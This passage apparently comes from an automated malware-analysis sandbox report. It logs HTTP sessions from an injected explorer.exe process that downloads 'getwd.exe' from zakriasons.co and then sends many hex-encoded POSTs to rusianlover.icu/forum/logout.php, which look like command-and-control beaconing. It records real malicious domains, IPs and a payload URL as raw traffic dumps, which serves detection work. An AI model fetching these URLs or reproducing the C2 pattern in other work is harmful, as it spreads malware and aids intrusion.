                                        Data Raw: 31 32 63 0d 0a 08 81 c9 2b af 8e dd 14 bb 0f 76 4d 7e a5 75 e6 5c d8 2c 61 86 cb c1 42 a1 fd 81 78 73 f1 d2 f4 d2 01 3c d8 d5 00 50 de 0d a6 56 07 86 40 86 5d 60 b4 6a ec 32 c4 97 f6 0b 8d 84 b0 fb bb 28 20 f2 70 4d 2d fa d7 c4 e6 0c a5 c4 1e 83 2f 5c 82 29 85 32 99 a9 86 3f eb 0e b1 85 a8 6c 98 56 57 d2 c5 cc 2c 31 a2 6a 50 61 57 d1 08 19 df 70 5d 72 bb 8c 57 0f b3 17 65 cd e1 0e b6 05 08 13 eb 4c 59 ba f9 97 0c 6e b0 ed 7d 63 2b 04 db 13 77 22 85 fb f8 d3 6a f9 d6 39 50 24 d8 63 4a da 10 8f 5f de 17 65 44 a6 0b 0e ea 70 5a 81 19 66 cd 17 e2 50 79 ef b8 85 f9 21 89 1d 92 d6 69 5d 7e cf a6 9f 16 a0 40 9f e3 b3 24 6a ef 80 4a 5b a5 ab 69 74 47 b4 48 53 ac 2f be f6 e8 cb ce 5e c2 c0 1b b2 3e e6 79 37 ae bb 80 c1 40 84 8d 81 80 24 34 a8 35 ce f8 a8 03 cd b3 0f f2 d5 4a ff 1c 2a 2c bb 8b 70 d7 82 75 3e db a7 33 08 40 5c 55 9d 8e 19 9f 18 37 8c 72 a6 88 68 0b fa 0f 9e 64 ec 7c d6 f3 3c 5d cc e7 2a 93 3b 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 12c+vM~u\,aBxs<PV@]`j2( pM-/\)2?lVW,1jPaWp]rWeLYn}c+w"j9P$cJ_eDpZfPy!i]~@$jJ[itGHS/^>y7@$45J*,pu>3@\U7rhd|<]*;0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49716 | 104.21.55.228 | 80 | C:\Windows\SysWOW64\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Mar 10, 2021 11:42:29.589483976 CET | 1163 | OUT | GET /wp-includes/rest-api/endpoints/898/getwd.exe HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: zakriasons.co
                                        Cache-Control: no-cache
Mar 10, 2021 11:42:29.635297060 CET | 1164 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Wed, 10 Mar 2021 10:42:29 GMT
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Cache-Control: max-age=3600
                                        Expires: Wed, 10 Mar 2021 11:42:29 GMT
                                        Location: https://zakriasons.co/wp-includes/rest-api/endpoints/898/getwd.exe
                                        cf-request-id: 08bd543071000005d0af0dd000000001
                                        Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=92qhQgjQlrtNEAm5h4x68aAKVxl5xZz0aUW7G3Nlh1NqZ2qU5FURM1AossSoU2js7td3%2B1Z8M8jXIOAFs5bt6ruhhNR1g%2F7mlpsgU%2BTE"}],"group":"cf-nel"}
                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 62dbefc719f105d0-FRA
                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.5 | 49732 | 212.114.52.43 | 80 | C:\Windows\SysWOW64\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Mar 10, 2021 11:42:54.231937885 CET | 5389 | OUT | POST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 692
                                        Cache-Control: no-cache
                                        Data Raw: 78 61 64 61 64 67 6a 3d 45 38 33 30 42 44 43 36 43 34 46 37 36 46 33 35 42 35 45 33 39 45 33 31 38 41 37 38 45 32 31 30 32 37 41 30 38 35 31 31 41 35 30 35 42 30 31 34 42 41 34 42 33 45 33 43 36 37 37 46 36 46 36 45 33 46 45 45 30 44 46 32 35 33 26 76 77 78 73 74 3d 36 39 30 34 36 34 34 31 26 7a 65 6a 69 6e 73 78 77 62 3d 30 38 63 30 66 39 37 33 32 65 64 65 63 37 37 64 30 33 64 63 64 65 39 30 65 36 63 38 34 32 35 34 36 35 34 63 37 31 31 35 33 62 63 62 30 39 33 62 30 63 62 63 62 63 39 30 62 36 35 65 62 63 32 35 33 62 34 38 65 37 63 66 63 36 37 63 63 38 31 34 36 32 37 31 32 36 32 37 30 36 35 36 66 36 37 36 35 34 35 62 63 30 38 34 62 32 38 35 30 31 32 35 64 31 62 38 61 39 32 61 65 63 65 39 65 66 39 62 39 35 38 36 34 64 32 66 61 65 33 31 39 64 64 33 62 39 38 36 61 65 32 35 33 33 31 33 31 61 65 34 61 34 64 34 33 39 35 36 33 32 36 32 66 64 66 35 32 64 31 66 61 62 65 65 31 61 31 61 34 33 31 61 66 66 31 35 35 61 38 34 63 35 34 31 33 35 31 37 38 64 61 61 39 37 39 37 31 66 33 33 36 39 62 64 34 33 65 32 33 63 31 31 34 65 61 33 34 39 37 36 37 64 39 66 61 38 30 64 38 34 37 31 66 63 61 32 35 62 65 66 33 65 61 36 39 36 39 66 62 37 37 38 63 66 39 66 39 31 38 35 31 63 32 38 36 66 38 64 33 33 39 38 30 37 38 30 31 65 63 35 34 35 31 35 63 32 61 31 61 35 36 34 32 31 39 36 62 33 63 63 36 64 36 38 36 38 33 33 34 30 39 36 66 37 32 61 35 32 39 33 33 31 62 31 30 36 61 31 39 33 62 64 30 63 64 66 39 61 36 33 30 66 61 31 64 35 36 34 39 37 65 63 64 35 37 36 36 36 64 37 65 64 31 30 65 63 61 33 64 35 36 61 38 39 63 33 39 66 63 62 37 66 36 32 61 34 32 32 33 31 63 31 33 62 31 31 66 61 32 31 63 39 62 64 36 38 34 36 34 31 33 34 34 33 30 64 63 62 37 38 34 32 64 37 64 37 37 63 35 38 34 32 62 35 66 33 39 63 35 39 39 38 36 62 34 35 62 63 34 37 62 31 61 63 38 33 61 34 34 33 63 32 64 30 33 31 38 62 65 37 63 63 38 62 31 30 31 34 64 34 31 66 37 34 33 31 39 63 36 38 66 35 61 30 30 33 65 34 64 64 32 39 30 33 36 33 66 37 33 32 63 33 36 66 63 66 66 64 36 35 32 34 
33 34 65 66 63 30 30 63 36 37 37 33 32 39 63 37 64 65 36 64 39 34 31 37 64 32 36 33 64 37 34 33 65 64 39 62 30 62 38 61 35 32
                                        Data Ascii: xadadgj=E830BDC6C4F76F35B5E39E318A78E21027A08511A505B014BA4B3E3C677F6F6E3FEE0DF253&vwxst=69046441&zejinsxwb=08c0f9732edec77d03dcde90e6c84254654c71153bcb093b0cbcbc90b65ebc253b48e7cfc67cc814627126270656f676545bc084b2850125d1b8a92aece9ef9b95864d2fae319dd3b986ae2533131ae4a4d439563262fdf52d1fabee1a1a431aff155a84c54135178daa97971f3369bd43e23c114ea349767d9fa80d8471fca25bef3ea6969fb778cf9f91851c286f8d339807801ec54515c2a1a5642196b3cc6d6868334096f72a529331b106a193bd0cdf9a630fa1d56497ecd57666d7ed10eca3d56a89c39fcb7f62a42231c13b11fa21c9bd68464134430dcb7842d7d77c5842b5f39c59986b45bc47b1ac83a443c2d0318be7cc8b1014d41f74319c68f5a003e4dd290363f732c36fcffd652434efc00c677329c7de6d9417d263d743ed9b0b8a52
Mar 10, 2021 11:42:54.303184986 CET | 5416 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:00 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a 80 12 ad 62 ed 09 14 33 e6 27 99 02 07 5c c5 94 27 ad b0 33 b4 d2 3b ee 2f 5b b9 48 9f 67 0d 32 3c b7 25 f2 f1 4f c4 b2 36 63 03 78 24 50 80 18 b5 6c ea b0 e1 fe 9f 20 5a 90 d1 fa f5 ca 52 e1 ed 27 28 36 6b 8d 00 f2 f7 ea 4c de 70 a5 ad a0 a4 90 41 91 96 8c da c8 d6 80 37 7d f1 4c 0e b4 e0 67 97 ec 33 10 cc f7 91 56 4f 82 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6db3'\'3;/[Hg2<%O6cx$Pl ZR'(6kLpA7}Lg3VO0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.5 | 49734 | 212.114.52.43 | 80 | C:\Windows\SysWOW64\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Mar 10, 2021 11:42:57.070462942 CET | 5444 | OUT | POST /forum/logout.php?page=1 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 635
                                        Cache-Control: no-cache
                                        Data Raw: 73 71 6f 6d 6b 69 61 79 3d 37 32 36 63 39 34 31 65 32 34 35 64 65 39 36 36 64 38 64 65 26 71 6d 69 65 61 77 3d 34 37 33 36 33 31 33 38 26 75 75 75 75 3d 32 36 36 44 44 30 36 43 42 37 42 36 39 43 38 35 43 31 32 34 41 33 31 33 38 30 34 32 38 31 46 35 45 45 31 46 39 36 35 46 32 37 42 46 37 44 46 45 31 39 38 37 35 37 43 42 43 36 43 46 38 45 34 33 41 46 41 41 36 38 34 43 35 41 43 46 30 38 44 35 36 34 37 31 31 35 36 46 39 38 30 38 46 46 36 39 33 30 43 42 39 32 43 36 31 37 45 39 30 33 30 42 31 36 42 31 41 41 45 43 33 33 31 37 30 33 35 32 37 33 33 31 36 38 37 44 31 42 42 35 31 39 35 30 44 33 44 36 37 37 37 32 35 45 32 34 30 36 33 32 34 45 46 37 42 37 38 46 46 34 41 35 32 37 41 38 37 45 42 46 39 44 46 45 35 30 35 39 46 42 33 35 34 38 32 44 39 30 30 31 35 41 32 35 39 41 31 36 38 35 36 37 43 38 32 45 38 35 42 43 32 41 36 37 30 44 46 32 45 46 39 39 31 31 45 36 41 41 45 33 37 37 30 30 31 42 33 35 34 30 41 39 46 38 35 45 38 30 36 37 43 31 42 45 41 31 32 30 34 38 45 35 32 39 45 41 41 46 35 41 46 42 34 35 33 30 42 35 32 32 45 31 33 44 30 35 45 43 39 46 32 36 33 34 41 30 44 38 34 30 38 31 41 39 34 46 42 42 42 39 44 32 41 35 30 32 41 41 37 44 30 41 35 34 32 41 32 32 37 30 34 35 43 46 35 39 46 45 37 38 35 46 36 30 34 39 46 45 41 38 46 34 35 36 38 31 30 38 34 32 30 43 36 33 38 43 35 42 31 44 42 45 42 33 34 46 35 31 46 33 41 37 31 35 44 35 35 33 31 42 38 30 45 45 45 35 45 37 35 30 46 35 41 33 32 37 30 44 32 45 44 34 30 38 42 30 31 34 39 43 30 45 32 46 37 38 31 30 43 34 39 30 30 42 35 43 45 39 30 33 45 37 42 44 43 32 36 41 39 35 30 33 32 32 37 41 46 33 33 41 38 34 38 38 41 41 35 37 36 32 34 42 42 33 46 34 30 45 45 42 43 30 34 34 35 44 41 45 33 32 46 41 36 38 33 39 41 42 34 44 39 35 46 44 43 34 34 44 37 45 34 44 44 43 43 45 32 34 41 46 33 41 33 41 43 33 37 44 46 42 34 30 42 36 33 36 39 43 32 33 35 41 39 46 37 39 38 35 43 31 41 32 43 32 35 39 38 32 41 30 32 42 38 44 41 41 36 34 43 43 32 31 41 31
Data Ascii: sqomkiay=726c941e245de966d8de&qmieaw=47363138&uuuu
Mar 10, 2021 11:42:57.148732901 CET | 5447 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:03 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a 61 b2 48 10 16 fc dc 18 ee 94 cc eb c3 62 de ab f1 1d 25 1d 44 01 c3 54 23 34 5d 13 58 1b b2 f3 c9 f6 ea d4 56 bd f3 76 f9 0a 72 41 82 57 19 a6 42 88 63 31 ed 79 df 67 bb 5c 5a 6a ea ef 1e 58 be b4 2f ce 19 fe 46 19 02 12 bb a8 53 3f 4d 7f 97 f6 06 30 7d d0 40 75 52 22 cd d3 88 83 5e 11 a3 40 8f 5a 77 84 21 7b 2b 99 f1 52 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6daHb%DT#4]XVvrAWBc1yg\ZjX/FS?M0}@uR"^@Zw!{+R0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.5 | 49741 | 212.114.52.43 | 80 | C:\Windows\SysWOW64\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Mar 10, 2021 11:42:59.927165985 CET | 10014 | OUT | POST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 649
                                        Cache-Control: no-cache
                                        Data Raw: 6f 63 71 65 73 67 75 69 3d 44 38 31 32 42 33 42 30 45 41 33 33 45 45 43 30 46 38 33 32 34 31 46 45 41 45 38 42 31 32 41 37 36 37 26 6d 79 6b 77 69 75 3d 35 35 33 32 30 31 31 36 26 71 67 77 6d 3d 34 44 31 42 43 33 36 35 36 35 39 38 30 42 32 43 34 41 31 45 38 42 35 46 43 30 36 44 45 43 32 41 46 38 41 38 38 33 37 36 43 30 41 43 31 39 38 34 34 43 44 38 41 43 37 33 38 37 34 43 44 41 32 34 31 44 35 34 34 33 34 38 33 37 33 35 44 31 46 37 34 30 33 31 30 32 35 45 41 39 30 44 38 37 33 37 46 35 38 35 41 31 35 30 43 35 34 34 46 42 31 43 33 38 35 36 30 36 43 42 45 34 32 43 46 43 46 32 39 38 33 39 32 46 38 44 42 43 37 30 43 37 37 31 38 36 35 36 45 36 41 41 32 44 45 34 41 44 30 46 41 30 33 45 31 30 31 35 36 32 34 43 37 31 46 33 41 32 44 34 39 30 43 32 36 42 43 39 39 46 39 31 42 32 43 39 32 37 43 43 33 38 39 46 30 39 35 43 44 35 34 38 37 33 34 36 38 42 39 42 37 45 41 33 30 36 44 39 39 36 36 39 37 30 43 30 37 32 41 38 35 45 39 32 41 34 38 33 36 43 33 30 39 41 42 45 43 45 41 38 38 44 44 45 41 46 37 30 37 46 38 41 33 38 34 43 33 44 36 30 45 31 35 37 43 35 31 39 34 38 32 35 38 30 37 37 33 41 32 38 37 31 34 33 39 32 38 42 32 35 31 44 39 46 34 39 35 34 35 36 44 39 32 31 30 46 36 30 39 32 37 42 36 45 46 43 34 38 36 45 33 42 37 38 31 46 41 41 42 33 32 34 46 42 45 41 46 31 46 32 33 31 46 30 33 37 43 33 34 33 31 46 41 36 36 36 39 44 45 46 31 46 42 31 41 32 41 30 36 46 35 36 37 38 44 41 36 44 44 36 41 31 42 31 41 34 36 33 43 37 37 38 43 44 38 46 44 33 34 30 42 43 44 37 33 41 39 43 35 32 44 41 36 37 34 35 44 30 35 31 38 35 45 38 34 38 33 46 30 36 41 41 36 32 44 36 41 37 30 45 43 31 45 39 30 41 43 33 44 35 31 45 41 32 31 44 44 41 31 46 30 41 33 33 31 45 44 41 36 39 33 38 38 42 39 38 44 31 31 45 42 37 41 37 44 43 44 30 30 37 42 37 35 34 36 42 45 45 34 39 45 45 41 35 33 34 39 38 44 45 31 45 45 34 39 32 36 46 41 35 43 43 38 43 46 37 39 44 31 30 39 44 38 42 39 36 33 33 34 38 35 37 32 45 42 30 30 43 32 30 37 42 33 34 42 44 38 37 34 42 37 35 36 37
Data Ascii: ocqesgui=D812B3B0EA33EEC0F83241FEAE8B12A767&mykwiu=55320116&qgwm
Mar 10, 2021 11:42:59.998224020 CET | 10015 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:06 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a 74 33 65 42 28 36 bd 33 df 4e 99 46 35 94 3c d3 34 5f 80 a5 71 7e ef ba 21 08 14 e2 c4 66 fb be 8d 92 cd 17 4b eb 87 8b fe 44 c3 bc 0d dd 4e 31 6f 65 14 c5 f7 28 37 18 f3 31 f3 7f ce 51 e1 90 85 a6 34 ed d5 24 bc 9a 33 63 b5 55 d6 cc 40 8d 44 13 08 9e 67 b4 e6 b6 b4 ab ec 33 40 0f 26 53 5f 05 4c db 87 45 5b 5f 32 4f e4 14 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6dt3eB(63NF5<4_q~!fKDN1oe(71Q4$3cU@Dg3@&S_LE[_2O0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.5 | 49742 | 212.114.52.43 | 80 | C:\Windows\SysWOW64\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Mar 10, 2021 11:43:02.820017099 CET | 10093 | OUT | POST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 671
                                        Cache-Control: no-cache
                                        Data Raw: 73 6b 69 61 3d 32 34 44 46 46 32 37 35 37 46 43 35 45 32 34 38 32 43 36 32 42 36 36 45 39 46 32 44 33 45 44 36 37 30 34 43 38 39 31 45 32 30 33 46 45 41 37 44 46 46 42 30 42 38 36 32 26 71 67 63 73 69 65 75 71 3d 31 39 33 33 34 33 35 36 26 75 6f 6f 69 63 63 3d 33 45 36 37 38 39 37 46 42 31 45 39 43 45 32 31 34 41 41 36 37 32 41 32 31 42 35 38 35 41 34 42 39 32 34 37 33 37 34 31 37 34 46 44 34 38 45 32 32 34 44 45 31 33 30 38 37 44 41 33 44 44 32 45 45 39 35 43 41 41 35 42 44 31 37 30 43 39 32 31 39 37 42 32 30 31 41 38 34 43 41 36 44 36 31 42 45 45 31 36 45 38 43 46 33 44 39 42 33 34 46 35 35 45 34 43 37 34 38 43 45 42 41 43 37 39 34 34 34 38 43 46 45 44 39 33 43 39 35 30 42 32 36 34 32 39 46 36 39 43 41 38 39 36 46 44 36 35 35 42 38 37 30 44 32 37 42 38 32 35 34 38 41 32 46 44 34 44 37 44 44 32 32 33 35 34 39 32 37 36 37 36 42 45 43 32 41 30 36 30 37 39 46 32 38 42 44 33 32 45 32 39 44 33 34 44 35 31 32 34 43 37 46 34 42 38 37 38 45 32 45 32 35 35 35 33 38 41 38 32 45 45 33 39 39 41 32 44 46 44 38 31 36 46 46 39 42 38 35 31 31 43 35 30 34 45 36 46 39 30 34 33 33 45 31 36 38 41 34 43 36 34 42 31 32 45 44 45 44 45 31 32 32 31 41 46 39 34 41 42 35 41 43 43 36 41 30 45 32 33 32 36 43 34 31 37 37 32 39 43 37 34 38 39 32 36 32 39 35 41 41 43 45 41 34 46 46 34 43 32 46 38 39 36 43 30 39 32 38 45 43 42 38 41 44 45 41 43 34 30 39 34 46 37 45 43 43 43 31 38 35 45 37 36 38 37 39 31 37 38 45 46 45 42 37 34 35 37 45 41 45 36 34 44 41 45 37 33 33 32 33 38 33 41 44 43 34 32 34 33 34 42 32 39 46 44 35 41 32 30 37 39 41 31 33 35 38 34 34 37 35 31 43 36 31 38 36 46 43 34 45 33 37 37 34 45 34 46 34 36 44 38 46 44 41 43 41 34 33 37 41 39 33 42 43 32 36 45 44 32 45 43 37 30 44 30 39 43 45 34 36 31 45 41 38 46 45 39 45 35 42 39 34 38 43 33 32 43 30 31 43 32 41 41 43 34 37 44 46 43 43 43 31 41 33 31 45 39 44 31 34 35 39 31 38 44 46 30 39 39 46 46 41 31 46 32 44 41 42 44 35 35 31 33 38 33 31 45 38 33 38 32 41 44 36 44 39 43 42 31 36 32 32 
39 37 30 31 35 42 46 36 35 44 31 41 36 35 30 32 44 30 34 32 43
                                        Data Ascii: skia=24DFF2757FC5E2482C62B66E9F2D3ED6704C891E203FEA7DFFB0B862&qgcsieuq=19334356&uooicc=3E67897FB1E9CE214AA672A21B585A4B9247374174FD48E224DE13087DA3DD2EE95CAA5BD170C92197B201A84CA6D61BEE16E8CF3D9B34F55E4C748CEBAC794448CFED93C950B26429F69CA896FD655B870D27B82548A2FD4D7DD22354927676BEC2A06079F28BD32E29D34D5124C7F4B878E2E255538A82EE399A2DFD816FF9B8511C504E6F90433E168A4C64B12EDEDE1221AF94AB5ACC6A0E2326C417729C748926295AACEA4FF4C2F896C0928ECB8ADEAC4094F7ECCC185E76879178EFEB7457EAE64DAE7332383ADC42434B29FD5A2079A135844751C6186FC4E3774E4F46D8FDACA437A93BC26ED2EC70D09CE461EA8FE9E5B948C32C01C2AAC47DFCCC1A31E9D145918DF099FFA1F2DABD5513831E8382AD6D9CB162297015BF65D1A6502D042C
Mar 10, 2021 11:43:02.893014908 CET | 10094 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:09 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding


                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                        14         | 192.168.2.5 | 49743       | 212.114.52.43  | 80               | C:\Windows\SysWOW64\explorer.exe
                                        Timestamp                           | kBytes transferred | Direction | Data
                                        Mar 10, 2021 11:43:05.646526098 CET | 10095              | OUT       | POST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 672
                                        Cache-Control: no-cache
                                        Mar 10, 2021 11:43:05.717017889 CET | 10096 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:12 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding


                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                        15         | 192.168.2.5 | 49744       | 212.114.52.43  | 80               | C:\Windows\SysWOW64\explorer.exe
                                        Timestamp                           | kBytes transferred | Direction | Data
                                        Mar 10, 2021 11:43:08.461410999 CET | 10097              | OUT       | POST /forum/logout.php?id=1106076 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 637
                                        Cache-Control: no-cache
                                        Mar 10, 2021 11:43:08.529418945 CET | 10098 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:14 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding


                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                        16         | 192.168.2.5 | 49745       | 212.114.52.43  | 80               | C:\Windows\SysWOW64\explorer.exe
                                        Timestamp                           | kBytes transferred | Direction | Data
                                        Mar 10, 2021 11:43:11.286036968 CET | 10099              | OUT       | POST /forum/logout.php?id=3125771 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 665
                                        Cache-Control: no-cache
                                        Mar 10, 2021 11:43:11.355935097 CET | 10100 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:17 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding


                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                        17         | 192.168.2.5 | 49747       | 212.114.52.43  | 80               | C:\Windows\SysWOW64\explorer.exe
                                        Timestamp                           | kBytes transferred | Direction | Data
                                        Mar 10, 2021 11:43:14.102725983 CET | 10111              | OUT       | POST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 653
                                        Cache-Control: no-cache
                                        Mar 10, 2021 11:43:14.175595045 CET | 10113 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:20 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding


                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                        18         | 192.168.2.5 | 49748       | 212.114.52.43  | 80               | C:\Windows\SysWOW64\explorer.exe
                                        Timestamp                           | kBytes transferred | Direction | Data
                                        Mar 10, 2021 11:43:16.929115057 CET | 10135              | OUT       | POST /forum/logout.php?pid=567 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 646
                                        Cache-Control: no-cache
                                        Mar 10, 2021 11:43:16.998594046 CET | 10135 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:23 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding


                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                        19         | 192.168.2.5 | 49749       | 212.114.52.43  | 80               | C:\Windows\SysWOW64\explorer.exe
                                        Timestamp                           | kBytes transferred | Direction | Data
                                        Mar 10, 2021 11:43:19.759953976 CET | 10137              | OUT       | POST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 672
                                        Cache-Control: no-cache
                                        Mar 10, 2021 11:43:19.829962969 CET | 10137 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:26 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding


                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                        2          | 192.168.2.5 | 49718       | 212.114.52.43  | 80               | C:\Windows\SysWOW64\explorer.exe
                                        Timestamp                           | kBytes transferred | Direction | Data
                                        Mar 10, 2021 11:42:33.676134109 CET | 1218               | OUT       | POST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 4727
                                        Cache-Control: no-cache
                                        Mar 10, 2021 11:42:33.756139994 CET | 1223 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:42:40 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding


                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                        20         | 192.168.2.5 | 49750       | 212.114.52.43  | 80               | C:\Windows\SysWOW64\explorer.exe
                                        Timestamp                           | kBytes transferred | Direction | Data
                                        Mar 10, 2021 11:43:23.035320997 CET | 10139              | OUT       | POST /forum/logout.php?id=9292886 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 655
                                        Cache-Control: no-cache
                                        Mar 10, 2021 11:43:23.106848955 CET | 10139 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:29 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                        21          192.168.2.5  49751        212.114.52.43   80                C:\Windows\SysWOW64\explorer.exe
                                        Timestamp                            kBytes transferred  Direction  Data
                                        Mar 10, 2021 11:43:26.019125938 CET  10141               OUT        POST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 641
                                        Cache-Control: no-cache
